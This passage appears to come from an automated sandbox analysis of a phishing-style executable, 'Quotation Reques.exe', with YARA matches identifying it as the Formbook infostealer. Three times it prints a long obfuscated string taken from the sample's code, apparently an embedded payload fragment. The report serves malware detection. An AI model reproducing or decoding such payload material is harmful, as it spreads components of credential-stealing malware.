          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_003A6FF0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_00395FC8
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_03082B28
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_0307DBD2
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_030703DA
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FEEBB0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_030822AE
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FE20A0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FCB090
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_03071002
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_0308E824
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_030820A8
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FD4120
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_030828EC
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FBF900
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_0308DFCE
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FD6E30
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_03081FF1
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_0307D616
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_03082EF7
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_03082D07
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_03081D55
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_030825DD
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FC841F
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FCD5E0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_0307D466
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FE2581
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FB0D20
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: String function: 0117B150 appears 35 times
          Source: C:\Windows\SysWOW64\cmd.exeCode function: String function: 02FBB150 appears 35 times
          Source: Quotation Reques.exe, 00000000.00000002.251892848.0000000002581000.00000004.00000001.sdmpBinary or memory string: OriginalFilename vs Quotation Reques.exe
          Source: Quotation Reques.exe, 00000000.00000002.251892848.0000000002581000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameAsyncState.dllF vs Quotation Reques.exe
          Source: Quotation Reques.exe, 00000000.00000002.260917358.0000000008520000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameLegacyPathHandling.dllN vs Quotation Reques.exe
          Source: Quotation Reques.exe, 00000000.00000002.261409049.0000000008900000.00000002.00000001.sdmpBinary or memory string: originalfilename vs Quotation Reques.exe
          Source: Quotation Reques.exe, 00000000.00000002.261409049.0000000008900000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamepropsys.dll.mui@ vs Quotation Reques.exe
          Source: Quotation Reques.exe, 00000000.00000002.261136477.0000000008800000.00000002.00000001.sdmpBinary or memory string: System.OriginalFileName vs Quotation Reques.exe
          Source: Quotation Reques.exe, 00000000.00000002.250833656.0000000000779000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Quotation Reques.exe
          Source: Quotation Reques.exe, 00000000.00000002.260463559.0000000008360000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemscorrc.dllT vs Quotation Reques.exe
          Source: Quotation Reques.exe, 00000000.00000002.257804637.0000000006B50000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameRIPEMD160.exe6 vs Quotation Reques.exe
          Source: Quotation Reques.exe, 00000006.00000002.295518659.00000000006D8000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameRIPEMD160.exe6 vs Quotation Reques.exe
          Source: Quotation Reques.exe, 00000006.00000002.300144272.0000000002D5D000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs Quotation Reques.exe
          Source: Quotation Reques.exe, 00000006.00000002.299930455.00000000013FF000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Quotation Reques.exe
          Source: Quotation Reques.exeBinary or memory string: OriginalFilenameRIPEMD160.exe6 vs Quotation Reques.exe
          Source: Quotation Reques.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 00000010.00000002.491075658.00000000027A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000010.00000002.491075658.00000000027A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.295452534.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.295452534.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000010.00000002.491565528.0000000002960000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000010.00000002.491565528.0000000002960000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000010.00000002.491847161.00000000029C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000010.00000002.491847161.00000000029C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.296373263.0000000000BD0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.296373263.0000000000BD0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.295627965.0000000000B80000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.295627965.0000000000B80000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.252275583.0000000003589000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.252275583.0000000003589000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 6.2.Quotation Reques.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.2.Quotation Reques.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 6.2.Quotation Reques.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.2.Quotation Reques.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.Quotation Reques.exe.370af40.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.Quotation Reques.exe.370af40.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.Quotation Reques.exe.36bb520.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.Quotation Reques.exe.36bb520.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: Quotation Reques.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: ftkqUsB.exe.0.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: Quotation Reques.exe, LogIn.csBase64 encoded string: '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
          Source: ftkqUsB.exe.0.dr, LogIn.csBase64 encoded string: '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
          Source: 0.2.Quotation Reques.exe.90000.0.unpack, LogIn.csBase64 encoded string: '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
